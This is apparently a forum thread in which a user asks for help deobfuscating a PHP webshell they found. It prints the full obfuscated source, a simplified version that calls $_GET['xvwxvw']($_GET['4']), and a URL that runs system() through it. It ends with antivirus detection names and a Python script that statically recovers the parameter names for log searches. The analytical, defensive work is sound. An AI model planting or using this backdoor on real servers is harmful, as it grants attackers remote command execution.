Hi,
This is my first post, so I'm not sure whether it belongs here.
The thing is, an obfuscated PHP script has come into my hands (I should clarify that I know nothing about PHP). After a while of digging I saw that I could run commands:

Code:

http://localhost/shell.php?xvwxvw=system&4=echo%20%22foyone%20presidente%22

But I find it impossible to deobfuscate this code; let's see if someone can help me:

Code:

<?php
$_=[];
$_=@"$_";
$__=!'';
$__=@"$__";
$___=@$_[''];
$____=$__;
++$____;
++$____;
$____=$_[$____];
$_=$__;
++$_;
++$_;
++$_;
++$_;
++$_;
$_=@"$_";
$_____=$____^$__;
$______=$____^$_;
$_______=$___^$__;
$________=$___^$_;
$_________=$__;
--$_________;
$_________=@"$_________";
$__________=$__;
++$__________;
++$__________;
++$__________;
$__________=@"$__________";
$___________=$___;
++$___________;
++$___________;
++$___________;
++$___________;
++$___________;
++$___________;
++$___________;
++$___________;
++$___________;
++$___________;
++$___________;
++$___________;
++$___________;
$____________=$______;
++$____________;
$_____________=$____;
++$_____________;
$______________=$____;
++$______________;
++$______________;
$_______________=$____;
++$_______________;
$💩=s.h.e.l.l;
++$_______________;
++$______________;
$________________=$____;
++$________________;
++$________________;
++$________________;
++$________________;
$_________________=$____;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
$__________________=$_______;
++$__________________;
++$__________________;
++$__________________;
$___________________=$_____________.@$____.@$__________________.@$________________.@$_.@$__________.''.@$______________.@$________________.@$______________.@$_________________.@$_______________.@$________________;
$____________________=$_______________.@$____________.@$___________.@$_________.@$_______________.@$____________.@$___________.@$_________;
$_=N.o.n.S.t.o.P;
$______________=base64_decode($____________________);
// base64_decode was added by me; it had an error before, and before it was also lots of "_"
$___________________=$______;
$____________________=$___________;
$_=A.r.r.a.w.t.s.u;
$_______=$___.$______.$_________________;
$__=!""*73+25-72-$_GET[$_________________];
$__=@"$__";
$___=@$_[''];
$____=$__;
++$____;
++$____;
$____=$_[$____];
$_=$__;
++$_;
++$_;
++$_;
++$_;
++$_;
$_=@"$_";
$_____=$____^$__;
$______=$____^$_;
$_______=$___^$__;
$________=$___^$_;
$_________=$__;
--$_________;
$_________=@"$_________";
$__________=$____;
++$__________;
++$__________;
++$__________;
++$__________;
$___________=$_______;
++$___________;
++$___________;
$____________=$_______;
++$____________;
++$____________;
++$____________;
$_____________=$_______;
++$_____________;
++$_____________;
++$_____________;
++$_____________;
$______________=$_______;
++$______________;
++$______________;
++$______________;
++$______________;
++$______________;
$_______________=$_______;
++$_______________;
++$_______________;
++$_______________;
++$_______________;
++$_______________;
++$_______________;
$________________=$____________.@$_____________.@$___________.@$___________.@$__________.@$_______________;
$_________________=$______________.@$____________.@$_____________.@$______________.@$____________.@$_____________;
//$_________________=$________________($_________________);
$_GET[$_________________]($_GET[$__________]);
$__________=$_________________=$___;

?>
Too much junk; still, here it is "deobfuscated" and simplified for you:

Code:

<?php
 $FunctionSeed = 'Arrawtsu';
 $MagicNumber  = '26';
 $XorValue    = $FunctionSeed[0] ^ $MagicNumber;

 echo '$FunctionSeed  = '.$FunctionSeed.PHP_EOL;
 echo '$MagicNumber    = '.$MagicNumber.PHP_EOL;
 echo '$XorValue      = '.$XorValue.PHP_EOL;

 $Char1=$XorValue;
 ++$Char1;
 ++$Char1;
 ++$Char1;
 echo '$Char1          = '.$Char1.PHP_EOL;

 $Char2=$XorValue;
 ++$Char2;
 ++$Char2;
 ++$Char2;
 ++$Char2;
 echo '$Char2          = '.$Char2.PHP_EOL;

 $Char3 = $XorValue;
 ++$Char3;
 ++$Char3;
 ++$Char3;
 ++$Char3;
 ++$Char3;
 echo '$Char3          = '.$Char3.PHP_EOL;

 $CalledFunction=$Char3.$Char1.$Char2.$Char3.$Char1.$Char2;
 echo '$CalledFunction = '.$CalledFunction.PHP_EOL;

 $CalledString=0;
 ++$CalledString;
 ++$CalledString;
 ++$CalledString;
 ++$CalledString;
 echo '$CalledString  = '.$CalledString.PHP_EOL;
 
 $_GET[$CalledFunction]($_GET[$CalledString]);
?>

//Regards.
Ikarus: Backdoor.VBS.SafeLoader
Agnitum: Trojan.VBS.Safebot.A
http://indeseables.github.io/
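To check the simplified version above without running the loader at all, here is an added example (my own code, not from either post) that statically emulates the three PHP behaviours the obfuscation relies on: the Perl-style string increment behind all the `++`, byte-wise string XOR that truncates to the shorter operand, and the coercion of numeric strings and the empty string. It walks the second half of the original script (from `$_=A.r.r.a.w.t.s.u;` onward); the readable variable names are my own labels for the underscore-only originals, and the `php_*` helpers are assumptions that cover only the cases this script exercises.

```python
"""Static emulation of the PHP tricks used by the obfuscated loader in this thread.

Added example (not the thread's code). It re-implements just enough PHP
semantics to recover the two $_GET parameter names without executing the
webshell, which is how an analyst confirms what the script does before
looking for it in access logs.
"""
import re


def php_increment(value):
    """Emulate PHP's ++ on an int or a string (assumed subset of PHP's rules)."""
    if isinstance(value, int):
        return value + 1
    if value == "":
        return "1"                      # PHP: ++ on "" yields the string "1"
    if re.fullmatch(r"-?\d+", value):
        return int(value) + 1           # numeric strings are coerced to int first
    chars = list(value)
    i = len(chars) - 1
    while i >= 0:                       # Perl-style alphanumeric increment with carry
        c = chars[i]
        if c == "z":
            chars[i] = "a"
        elif c == "Z":
            chars[i] = "A"
        elif c == "9":
            chars[i] = "0"
        elif c.isascii() and c.isalnum():
            chars[i] = chr(ord(c) + 1)
            return "".join(chars)
        else:
            return "".join(chars)       # PHP stops the carry at a non-alphanumeric char
        i -= 1
    first = value[0]                    # carry ran off the front: PHP prepends "1", "a" or "A"
    lead = "1" if first.isdigit() else ("a" if first.islower() else "A")
    return lead + "".join(chars)


def inc(value, times):
    """Apply php_increment `times` times (one ++ per line in the original)."""
    for _ in range(times):
        value = php_increment(value)
    return value


def php_xor(a, b):
    """PHP's string ^ string: byte-wise XOR truncated to the shorter operand."""
    return "".join(chr(ord(x) ^ ord(y)) for x, y in zip(a, b))


def php_string_offset(s, index):
    """Emulate @$s[$index] on a string: '' acts as offset 0, out of range yields ''."""
    i = 0 if index == "" else int(index)
    return s[i] if 0 <= i < len(s) else ""


def resolve_parameter_names():
    """Walk the loader from `$_=A.r.r.a.w.t.s.u;` to `$_GET[...]($_GET[...]);`."""
    seed = "Arrawtsu"                        # bare words -> undefined constants -> their own names
    magic = str(int(not "") * 73 + 25 - 72)  # !"" is true (1); the missing $_GET entry is null -> "26"
    first_char = php_string_offset(seed, "")            # $___ = @$_['']  -> "A"
    empty = php_string_offset(seed, str(inc(magic, 2)))  # $____ = $_[28] -> "" (out of range)
    xor_a = php_xor(first_char, magic)       # $_______ = "A" ^ "26" -> "s"
    c3 = inc(xor_a, 3)                       # "v"
    c4 = inc(xor_a, 4)                       # "w"
    c5 = inc(xor_a, 5)                       # "x"
    function_param = c5 + c3 + c4 + c5 + c3 + c4   # "xvwxvw"
    argument_param = str(inc(empty, 4))      # "" -> "1" -> 2 -> 3 -> 4
    return function_param, argument_param


if __name__ == "__main__":
    fn, arg = resolve_parameter_names()
    print(f"$_GET['{fn}']($_GET['{arg}'])")
```

Running it prints `$_GET['xvwxvw']($_GET['4'])`, which is exactly the pair of query-string keys seen in the first post's URL; the two names are the strings a defender would search for in web server logs to find whether this loader was ever invoked.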